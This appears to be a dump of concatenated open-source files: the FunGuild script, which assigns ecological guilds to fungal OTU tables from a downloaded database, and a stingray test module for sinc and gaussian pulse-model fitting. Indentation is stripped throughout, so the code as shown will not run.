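# version in use, so treat this as an assumption rather than the actual setup.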
| acsone/acsone-addons | account_analytic_project_id/post_install.py | Python | agpl-3.0 | 1,398 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Copyright (C) 2014-2015 Zewei Song
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
This script assigns functional information to the OTUs in the user's OTU table. The OTU table needs to have a column named 'taxonomy', which contains information from a reference database (such as UNITE - https://unite.ut.ee/). It is required that the first line of the OTU table to be the header, without any additional comments. Some programs, such as QIIME will add an additional row of comments before the header, and this has to be removed before using the FunGuild script. The script will try to recognized the delimiter in the user's OTU table, but comma (.csv) or tab (.txt) delimiter formats are recommended.
The functional databases are fetched from http://www.stbates.org/funguild_db.php or http://www.stbates.org/nemaguild_db.php
Script usage: Guilds_v1.0.py [-h] [-i OTU_table] [-d {fungi,nematode}] [-m] [-u] [-o OUT]
optional arguments:
  -h, --help       Show this help message and exit
  -i, --input      Path and file name of the OTU table. The script will try to
                   detect the delimiter in the file, but tab or csv are
                   preferred formats.
  -d, --db         Database to use ('fungi' or 'nematode') [default: fungi]
  -m, --matched    Ask the script to output an otu table containing only OTUs
                   for which functional assignments have been made
  -u, --unmatched  Ask the script to output an otu table containing only OTUs
                   for which functional assignments could not be made
  -o, --out        Output file base name
This is an example command to run this script:
python Guilds_v1.0.py -i user_otu_table.txt
The script will have one output file with a suffix appended to the input name: user_otu_table.guilds.txt
By using -m and -u, the script will produce two additional files:
-m will output a file containing only OTUs that have been assigned a function: user_otu_table.guilds_matched.txt
-u will output a file containing only OTUs that were not matched in the database: user_otu_table.guilds_unmatched.txt
Care should be taken in managing directories as existing files will be overwritten without notice if matching file names (e.g., user_otu_table.matched.txt) are generated by the script.
By using the -d (--db) option, you will select the reference database for your group of organisms, currently 'fungi' or 'nematode'. The default is 'fungi'.
All output tables are sorted according to the sum total number of sequences corresponding to each OTU (rank OTU abundance).
###################################################################################
Development history:
The idea of parsing OTUs into functions originated from an python script by Sara Branco that segregated Ectomycorrhizal (EM), potential EM, and non-EM fungal OTUs (Branco et al. 2013. PLoS One 8: 1–10).
The algorithm used by FunGuild was first developed by Scott T. Bates in R to assign functions to any fungal taxon and to indicate a probability for the assignment.
The current FunGuild script has been developed by Zewei Song in python in order to improve functionality, performance and cross-platform compatibility.
###################################################################################
Zewei Song
2/14/2015
songzewei@outlook.com
'''
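# Hedged example (editor addition): a minimal input this script accepts is a
# tab-delimited OTU table whose header row includes a 'taxonomy' column, e.g.
#
#     OTU_ID  Sample1 Sample2 taxonomy
#     OTU_1   12      3       k__Fungi;p__Basidiomycota;...;g__Russula;s__Russula_sp
#     OTU_2   0       44      k__Fungi;p__Ascomycota;...
#
# Other column names are free-form; the taxonomy string is matched against
# FUNGuild records at any taxonomic level after separators are normalised.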
from __future__ import print_function
from __future__ import division
#Import modules#################
from future import standard_library
standard_library.install_aliases()
from builtins import map
from builtins import range
from past.utils import old_div
import argparse
import os
import timeit
import sys
from operator import itemgetter
import csv
try:
from urllib.request import urlopen
except ImportError:
from urllib2 import urlopen
def main(args):
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--input", help="Path and file name of the OTU table. The script will try to detect the delimiter"
"in the file, but tab or csv are preferred formats.")
parser.add_argument("-m", "--matched", action="store_true", help="Ask the script to output a otu table with function assigned OTUs")
parser.add_argument("-u", "--unmatched", action="store_true", help="Ask the script to output a otu table with function assigned OTUs")
parser.add_argument("-d","--db", choices=['fungi','nematode'], default='fungi', help="Assign a specified database to the script")
parser.add_argument("-o","--out", help="Output file base name")
args = parser.parse_args(args)
start = timeit.default_timer()
#input files
otu_file = args.input
#Detect delimiter in the input file
with open(otu_file, 'r') as f1:
dialect = csv.Sniffer().sniff(f1.read())
otu_delimiter = str(dialect.delimiter)
if otu_delimiter == str(';'):
out_delimiter = str('\t')
#setup the output files and naming
if args.out:
base = args.out
else:
base = args.input.split('.otu_table.taxonomy.txt')[0]
matched_file = base + '.guilds_matched.txt'
    unmatched_file = base + '.guilds_unmatched.txt'
total_file = base + '.guilds.txt'
###########################################################################################
# Import Function Database from GitHub, and get it ready.##################################
print("FunGuild v1.0 Beta")
database_name = args.db
if database_name == 'fungi':
url = 'http://www.stbates.org/funguild_db.php'
elif database_name == 'nematode':
url = 'http://www.stbates.org/nemaguild_db.php'
print("Downloading %s database ..." % database_name)
function_file = 'temp_db.txt' #temp file to store database file
temp = 'temp.txt'
urlFile = urlopen(url)
data = urlFile.read().decode('utf-8')
new_data = data.split("} , {")
#Fix the first and last record
new_data[0] = new_data[0][3:]
new_data[-1]=new_data[-1][:-3]
#Parse the record and write temp data file
with open(function_file, 'w') as f:
f.write("Taxon\tTaxon Level\tTrophic Mode\tGuild\tConfidence Ranking\tGrowth Morphology\tTrait\tNotes\tCitation/Source\n")
parse_data = []
for line in new_data:
record = line
rec = record.split(" , ")
del rec[0]
current_rec = []
for item in rec:
p = item.find(":")
cleaned_item = item[p+2:].replace('"','')
current_rec.append(cleaned_item.encode('ascii', 'ignore').decode('ascii'))
f.write('{:}\n'.format('\t'.join(current_rec)))
#Detect the position of header
with open(function_file, 'r') as f_database:
for line in f_database:
if line.find('Taxon') != -1: #Search for the line that contains the header (if it is not the first line)
header_database = line.split('\t')
break
#Check the database header.
if len(header_database) == 1:
header_database = header_database[0].split(" ")
# Set the parameters for progress report
with open(function_file) as f1:
i = 0
for line in f1:
i += 1
total_length = float(i) #length of the database
p = list(range(1,11))
way_points = [int(total_length*(old_div(x,10.0))) for x in p]
############################################################################################
# Open the OTU table and read in the header ################################################
print("")
print("Reading in the OTU table: '%s'" %(args.input))
print("")
#load the header
with open(otu_file, 'r') as otu:
header = otu.readline().rstrip().split(otu_delimiter)
#Attach all columns of database file to the header of the new OTU table
for item in header_database:
header.append(item)
#look for Taxonomy or taxonomy
    if 'taxonomy' in header:
        lookup = 'taxonomy'
    elif 'Taxonomy' in header:
        lookup = 'Taxonomy'
    else:
        #Abort if neither 'taxonomy' nor 'Taxonomy' is found
        print("Column 'taxonomy' not found. Please check your OTU table %s." % (otu_file))
        sys.exit(0)
    # get the positions of the taxonomy column and Notes column
    index_tax = header.index(lookup)
    index_notes = header.index('Notes')
############################################################################################
#Search in function database################################################################
# Read the OTU table into memory, and separate taxonomic levels with '@'.
with open(otu_file, 'r') as otu:
otu_tab = []
for record in otu:
otu_current = record.split(otu_delimiter)
otu_taxonomy = otu_current[index_tax].rstrip('\n')
replace_list = ['_', ' ', ';', ',', ':']
for symbol in replace_list:
otu_taxonomy = otu_taxonomy.replace(symbol, '@')
otu_taxonomy = otu_taxonomy + '@'
otu_current[index_tax] = otu_taxonomy
otu_tab.append(otu_current)
otu_tab = otu_tab[1:] # remove the header line
# Start searching the database
## Each record in the Fungal Guild Database is searched in the user's OTU table.
count = 0 # count of matching records in the OTU table
percent = 0 # line number in the database
otu_redundant = []
otu_new = []
print("Searching the FUNGuild database...")
with open(function_file, 'rb') as f_database:
for record in f_database:
record = record.decode('utf-8')
# report the progress
percent += 1
if percent in way_points:
progress = (int(round(percent/total_length*100.0)))
print('{}%'.format(progress))
else: t = 0
# Compare database with the OTU table
function_tax = record.split('\t')
search_term = function_tax[0].replace(' ', '@') #first column of database, contains the name of the species
search_term = '@' + search_term + '@' #Add @ to the search term
#print(search_term)
for otu in otu_tab:
otu_tax = otu[index_tax] # Get the taxonomy string of current OTU record.
#print(otu_tax)
if otu_tax.find(search_term) >= 0: #found the keyword in this OTU's taxonomy
count += 1 # Count the matching record
otu_new = otu[:]
# Assign the matching functional information to current OTU record.
for item in function_tax:
otu_new.append(item)
otu_redundant.append(otu_new)
#sys.exit(1)
# Finish searching, delete the temp function database file
if os.path.isfile('temp_db.txt') == True:
os.remove('temp_db.txt')
print("")
print("Found %i matching taxonomy records in the database."%(count))
print("Dereplicating and sorting the result...")
#Dereplicate and write to output file##########################################################
#Sort by OTU names and Level. Level is sorted from species to kingdom.
otu_sort = otu_redundant[:]
otu_sort.sort(key = itemgetter(index_tax), reverse = True) # Sort the redundant OTU table by Taxonomic Level.
otu_sort.sort(key = itemgetter(0)) # Sort the redundant OTU table by OTU ID.
#Dereplicate the OTU table, unique OTU ID with lowest taxonomic level will be kept.
otu_id_list = []
unique_list = []
count = 0
for item in otu_sort:
if item[0] not in otu_id_list:
count += 1
otu_id_list.append(item[0])
unique_list.append(item)
#Copy the original taxonomy string (without @) to the unique OTU table
otu_tax = []
with open(otu_file, 'r') as f_otu:
for otu in f_otu:
temp = otu.rstrip('\n').split(otu_delimiter)
otu_tax.append(temp)
otu_tax = otu_tax[1:]
for new_rec in unique_list:
for rec in otu_tax:
if new_rec[0] == rec[0]:
new_rec[index_tax] = rec[index_tax]
#Sort the new otu table by the total sequence number of each OTU.
unique_list.sort(key=lambda x: float(sum(map(float,x[1:index_tax]))), reverse=True)
################################################################################################
#Write to output files##############################################################################
#Output matched OTUs to a new file
if args.matched:
if os.path.isfile(matched_file) == True:
os.remove(matched_file)
output = open(matched_file,'a')
#Write the matched list header
output.write('%s' % ('\t'.join(header))) #Header
#Write the matched OTU table
for item in unique_list:
rec = '\t'.join(item)
output.write('%s' % rec)
output.close()
#Output unmatched OTUs to a new file
unmatched_list = []
for rec in otu_tax:
count2 = 0
for new_rec in unique_list:
if rec[0] == new_rec[0]: #Check if the current record is in the unique_list (has been assigned a function)
count2 += 1
if count2 == 0:
unmatched_list.append(rec)
count_unmatched = 0
#Add 'Unassigned' to the 'Notes' column
for item in unmatched_list:
l = len(header) - len(item)
for i in range(l):
item.extend('-')
item[index_notes] = 'Unassigned'
if args.unmatched:
if os.path.isfile(unmatched_file) == True:
os.remove(unmatched_file)
output_unmatched = open(unmatched_file, 'a')
output_unmatched.write('%s' % ('\t'.join(header)))
for item in unmatched_list:
rec = '\t'.join(item)
output_unmatched.write('%s\n' % rec)
count_unmatched += 1
output_unmatched.close()
#Output the combined matched and unmatched OTUs to a new file
if os.path.isfile(total_file) == True:
os.remove(total_file)
total_list = unique_list + unmatched_list #Combine the two OTU tables
total_list.sort(key=lambda x: float(sum(map(float,x[1:index_tax]))), reverse=True) #Sorted the combined OTU table
output_total = open(total_file, 'a')
output_total.write('%s' % ('\t'.join(header)))
count_total = 0
for item in total_list:
rec = ('\t'.join(item)).strip('\n')
output_total.write('%s\n' % rec)
count_total += 1
output_total.close()
####################################################################################################################
#Print report on the screen#########################################################################################
print("FunGuild tried to assign function to %i OTUs in '%s'." %(count_total, otu_file))
print("FUNGuild made assignments on %i OTUs." %(count))
print("Result saved to '%s'" %(total_file))
if args.matched or args.unmatched:
print('\nAdditional output:')
if args.matched:
print("FUNGuild made assignments on %i OTUs, these have been saved to %s." %(count, matched_file))
if args.unmatched:
print("%i OTUs were unassigned, these are saved to %s." %(count_unmatched, unmatched_file))
# Finish the program
stop = timeit.default_timer()
runtime = round((stop-start),2)
print("\nTotal calculating time: {} seconds.".format(runtime))
if __name__ == "__main__":
    main(sys.argv[1:])
####################################################################################################################
| nextgenusfs/ufits | amptk/Guilds.py | Python | bsd-2-clause | 16,269 |
import numpy as np
from stingray.pulse.modeling import fit_sinc, fit_gaussian, SincSquareModel
np.random.seed(0)
def test_sinc_function():
x = np.linspace(-5., 5., 200)
y = 2 * (np.sin(x)/x)**2
y += np.random.normal(0., 0.1, x.shape)
s = fit_sinc(x, y)
assert np.abs(s.mean) < 0.1
assert np.abs(s.amplitude - 2) < 0.1
assert np.abs(s.width - 1) < 0.1
def test_sinc_fixed():
x = np.linspace(-5., 5., 200)
y = 2 * (np.sin(x)/x)**2
y += np.random.normal(0., 0.1, x.shape)
sf = fit_sinc(x, y, mean=1., fixed={"mean": True, "amplitude": False})
assert sf.mean.fixed
assert not sf.amplitude.fixed
def test_sinc_obs():
obs_length = 0.32
x = np.linspace(-5., 5., 200)
w = 1 / (np.pi*obs_length)
y = 2 * (np.sin(x / w) / (x / w))**2
y += np.random.normal(0., 0.1, x.shape)
s = fit_sinc(x, y, obs_length=obs_length)
assert np.abs(1 / (np.pi*obs_length) - s.width) < 0.1
assert s.width.fixed
def test_gaussian_function():
x = np.linspace(-5., 5., 200)
y = 2 * np.exp(-0.5 * (x - 1.3)**2 / 0.7**2)
y += np.random.normal(0., 0.1, x.shape)
gs = fit_gaussian(x, y)
assert np.abs(gs.mean - 1.3) < 0.1
assert np.abs(gs.amplitude - 2) < 0.1
assert np.abs(gs.stddev - 0.7) < 0.1
def test_gaussian_bounds():
x = np.linspace(-5., 5., 200)
y = 2 * np.exp(-0.5 * (x - 1.3)**2 / 0.7**2)
y += np.random.normal(0., 0.1, x.shape)
gs = fit_gaussian(x, y,
bounds={"mean": [1., 1.6], "amplitude": [1.7, 2.3]})
def test_gaussian_fixed():
x = np.linspace(-5., 5., 200)
y = 2 * np.exp(-0.5 * (x - 1.3)**2 / 0.7**2)
y += np.random.normal(0., 0.1, x.shape)
gs = fit_gaussian(x, y, mean=1.3, fixed={"mean": True, "amplitude": False})
assert gs.mean.fixed
assert not gs.amplitude.fixed
def test_gaussian_tied():
x = np.linspace(-5., 5., 200)
y = 2 * np.exp(-0.5 * (x - 1.3)**2 / 0.7**2)
y += np.random.normal(0., 0.1, x.shape)
def tiedgaussian(model):
mean = model.amplitude / 2
return mean
gs = fit_gaussian(x, y, tied={"mean": tiedgaussian})
assert np.abs(gs.mean/gs.amplitude - 0.5) < 0.1
def test_pickle_SincSquared():
import pickle
a = SincSquareModel(amplitude=13., mean=3, width=12.)
with open('bubufile.p', 'wb') as f:
pickle.dump(a, f)
with open('bubufile.p', 'rb') as f:
b = pickle.load(f)
assert a.amplitude == b.amplitude
assert a.mean == b.mean
assert a.width == b.width
| StingraySoftware/stingray | stingray/pulse/tests/test_modeling.py | Python | mit | 2,534 |